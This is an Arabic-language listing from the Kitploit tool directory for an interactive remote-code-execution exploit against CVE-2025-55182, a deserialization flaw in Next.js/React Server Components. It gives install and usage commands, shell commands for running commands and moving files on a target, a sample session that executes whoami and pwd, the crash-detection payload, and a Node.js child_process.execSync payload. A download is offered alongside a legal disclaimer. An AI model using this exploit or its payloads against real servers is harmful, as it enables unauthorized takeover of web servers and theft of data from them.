Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182-shellinteractive — استغلال تفاعلي لتنفيذ رمز عن بُعد لـ CVE-2025-55182 يستهدف ثغرة إلغاء تسلسل مكونات خادم Next.js/React. يتميز بالكشف التلقائي، وتنفيذ الأوامر، ونقل الملفات، وقشرة مدمجة مع سجل وإكمال تلقائي. | Kitploit
أدوات/GitHubGitHub/mrr0b0t19/cve-2025-55182-shellinteractive
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubmrr0b0t19/cve-2025-55182-shellinteractive

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

CVE-2025-55182-shellinteractive

استغلال تفاعلي لتنفيذ رمز عن بُعد لـ CVE-2025-55182 يستهدف ثغرة إلغاء تسلسل مكونات خادم Next.js/React. يتميز بالكشف التلقائي، وتنفيذ الأوامر، ونقل الملفات، وقشرة مدمجة مع سجل وإكمال تلقائي.

عرض المستودع
213منذ 9 أشهرتمت المراجعة من قبل Kitploit
مشاركة

CVE-2025-55182-shellinteractive

الأساس المستخدم من: https://github.com/Emiyelbarto/CVE-2025-55182-PoC شكرًا جزيلًا على المساهمة الرائعة.

نظرة عامة

CVE-2025-55182 هي ثغرة إلغاء تسلسل في Next.js/React Server Components تسمح للمهاجمين عن بُعد غير المصادَق عليهم بتنفيذ تعليمات برمجية عشوائية على الخوادم المتأثرة. تنبع الثغرة من المعالجة غير السليمة للبيانات المتسلسلة في React Server Actions.

الميزات الرئيسية:

  • ✅ صدفة تفاعلية مع سجل أوامر وإكمال تلقائي
  • ✅ اكتشاف تلقائي للثغرات
  • ✅ تنفيذ أوامر عن بُعد
  • ✅ إمكانيات رفع/تنزيل الملفات
  • ✅ مجموعة اختبارات مدمجة
  • ✅ معاملات هدف قابلة للتكوين

التثبيت

المتطلبات الأساسية

  • Python 3.8 أو أحدث
  • مكتبة requests

الإعداد السريع

root@kitploit:~
# Clone the repository
git clone https://github.com/yourusername/hokma.git
cd hokma

# Install dependencies
pip install requests

# Make script executable (optional)
chmod +x hokma.py

الاستخدام

الاستخدام الأساسي

root@kitploit:~
# Start interactive shell
python hokma.py

# Check vulnerability only
python hokma.py -u http://target.com --check

# Execute single command
python hokma.py -u http://target.com -c "whoami"

أوامر الصدفة التفاعلية

root@kitploit:~
help                    Show this help message
set URL <url>          Set target URL
set ID <action_id>     Set action ID (default: user-profile-action)
show                   Show current options
check [url]            Check if target is vulnerable
exploit <command>      Execute command on target
shell                  Start interactive command shell
test                   Run test commands (id, whoami, etc.)
upload <loc> <rem>     Upload local file to target
download <rem> <loc>   Download remote file (base64 encoded)
clear                  Clear screen
exit/quit              Exit the shell

مثال على جلسة استخدام

root@kitploit:~
$ python hokma.py

  ____                 _     ____  _          _ _ 
 |  _ \ ___  __ _  ___| |_  / ___|| |__   ___| | |
 | |_) / _ \/ _` |/ __| __| \___ \| '_ \ / _ \ | |
 |  _ <  __/ (_| | (__| |_   ___) | | | |  __/ | |
 |_| \_\___|\__,_|\___|\__| |____/|_| |_|\___|_|_|
                                                  
 React Server Components RCE Exploit (CVE-2025-55182)
Interactive Shell - Type 'help' for commands

hokma> set URL http://vulnerable-app.com
[+] URL set to: http://vulnerable-app.com

hokma> check
[*] Checking vulnerability on target: http://vulnerable-app.com...
[+] TARGET IS VULNERABLE!

hokma> exploit whoami
[*] Executing command: whoami
[*] Server responded with status: 200

--- COMMAND OUTPUT ---
www-data
----------------------

hokma> shell
[*] Starting reverse shell. Use 'exit' to return.
[*] Enter commands to execute on target:
cmd> pwd
[*] Executing command: pwd

--- COMMAND OUTPUT ---
/var/www/html
----------------------
cmd> exit

خيارات التكوين

الخيارالافتراضيالوصف
رابط الهدفلا شيءرابط التطبيق المعرّض للثغرة
معرّف الإجراءuser-profile-actionمعرّف إجراء الخادم المستهدف
المهلة الزمنية3 ثوانٍالمهلة الزمنية للطلبات

التفاصيل التقنية

اكتشاف الثغرة

ترسل الأداة طلب multipart مصممًا خصيصًا يؤدي إلى انهيار الأنظمة المعرّضة للثغرة:

  • تستخدم الحمولة: ["$1:a:a"] مع كائن فارغ {}
  • تكتشف الثغرة عبر استجابات HTTP 500 أو أنماط أخطاء محددة

آلية الاستغلال

  1. إنشاء حمولة JavaScript: ينشئ برنامج Node.js النصي باستخدام مُنشئ Function
  2. تنفيذ العملية الفرعية: يستخدم child_process.execSync() لتشغيل أوامر النظام
  3. استخراج الاستجابة: يلتقط مخرجات الأوامر ويعرضها

بنية الحمولة

root@kitploit:~
const cmd = "COMMAND";
return import('child_process').then(cp => {
    try {
        const output = cp.execSync(cmd).toString();
        return output;
    } catch(e) { 
        return "Command Execution Failed: " + e.message; 
    }
});

الاستخدام الأخلاقي وإخلاء المسؤولية

إشعار قانوني مهم

هذه الأداة مخصصة لـ:

  • اختبارات الأمان المصرح بها
  • الأغراض التعليمية
  • أبحاث الثغرات الأمنية بموافقة مناسبة

لا تستخدم هذه الأداة ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وغير أخلاقي.

المطورون غير مسؤولين عن أي إساءة استخدام لهذه الأداة. يجب على المستخدمين الامتثال لجميع القوانين المعمول بها والحصول على التصريح المناسب قبل الاختبار.

القيود المعروفة

  1. متطلبات الهدف:

    • خادم Node.js مع React Server Components
    • عرضة لثغرة CVE-2025-55182
    • وحدة العملية الفرعية (child process) متوفرة
  2. قيود الاكتشاف:

    • قد تُنتج نتائج إيجابية/سلبية خاطئة
    • تعتمد على استجابات أخطاء محددة
  3. قيود الاستغلال:

    • تُنفَّذ الأوامر بصلاحيات عملية الخادم
    • قد يُقتطع الناتج في بعض الحالات
    • قد تتطلب الأوامر المعقدة تهريبًا خاصًا (escaping)
تنزيل الأداة